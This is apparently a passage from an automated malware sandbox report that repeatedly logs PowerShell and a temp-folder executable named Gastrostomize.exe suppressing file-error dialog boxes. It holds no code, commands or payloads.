Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX